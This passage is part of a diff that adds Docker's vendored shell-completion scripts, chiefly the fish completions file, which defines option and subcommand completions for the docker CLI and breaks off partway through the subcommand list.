+ # dockerd does not have subcommands and global options. + command=daemon + command_pos=0 + fi + + local completions_func=_docker_${command} + declare -F $completions_func >/dev/null && $completions_func + + eval "$previous_extglob_setting" + return 0 +} + +eval "$__docker_previous_extglob_setting" +unset __docker_previous_extglob_setting + +complete -F _docker docker dockerd diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish new file mode 100644 index 0000000000..2715cb1aa6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish @@ -0,0 +1,405 @@ +# docker.fish - docker completions for fish shell +# +# This file is generated by gen_docker_fish_completions.py from: +# https://github.com/barnybug/docker-fish-completion +# +# To install the completions: +# mkdir -p ~/.config/fish/completions +# cp docker.fish ~/.config/fish/completions +# +# Completion supported: +# - parameters +# - commands +# - containers +# - images +# - repositories + +function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand' + for i in (commandline -opc) + if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats + return 1 + end + end + return 0 +end + +function __fish_print_docker_containers --description 'Print a list of docker containers' -a select + switch $select + case running + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n' + case stopped + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n' + case all + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; 
{print $1 "\n" $(NF)}' | tr ',' '\n' + end +end + +function __fish_print_docker_images --description 'Print a list of docker images' + docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1":"$2}' +end + +function __fish_print_docker_repositories --description 'Print a list of docker repositories' + docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1}' | command sort | command uniq +end + +# common options +complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled" +complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge' +complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b" +complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains' +complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 
10.20.0.0/16)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)' +complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime' +complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.' +complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage' +complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication' +complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports' +complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.' 
+complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range" +complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules" +complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking' +complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")' +complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU' +complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror' +complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver' +complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. 
SELinux does not presently support the BTRFS storage driver' +complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)' +complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit' + +# subcommands +# attach +complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.' 
+complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container" + +# build +complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)" +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to be applied to the resulting image in case of success' + +# commit +complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes" +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith ")' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit' +complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers 
all)' -d "Container" + +# cp +complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem" +complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage' + +# create +complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. 
if you don't wish to set the search domain)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of :alias' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 
92:d0:c6:0a:29:33)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only" +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working 
directory inside the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image" + +# diff +complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem" +complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container" + +# events +complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')" +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template' + +# exec +complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container" + +# export +complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar 
archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container" + +# history +complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image" + +# images +complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')" +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository" + +# import +complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball' +complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage' + +# info +complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information' +complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format -d 'Format the 
output using the given go template' +complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage' + +# inspect +complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.' +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container" + +# kill +complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container" + +# load +complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN' + +# login +complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password' +complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u 
-l username -d 'Username' + +# logout +complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server' + +# logs +complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)' +complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container" + +# port +complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT' +complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container" + +# pause +complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container" + +# ps +complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.' 
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes' +complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.' + +# pull +complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository" + +# push +complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server' +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image" +complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository" + +# 
rename +complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container' + +# restart +complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.' +complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container" + +# rm +complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container" +complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container" + +# rmi +complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents' +complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a 
'(__fish_print_docker_images)' -d "Image" + +# run +complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. 
if you don't wish to set the search domain)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' +complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of :alias' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 
92:d0:c6:0a:29:33)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only" +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.' 
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container' +complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image" + +# save +complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT' +complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image" + +# search +complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output" +complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars' + +# start +complete -c docker -f -n 
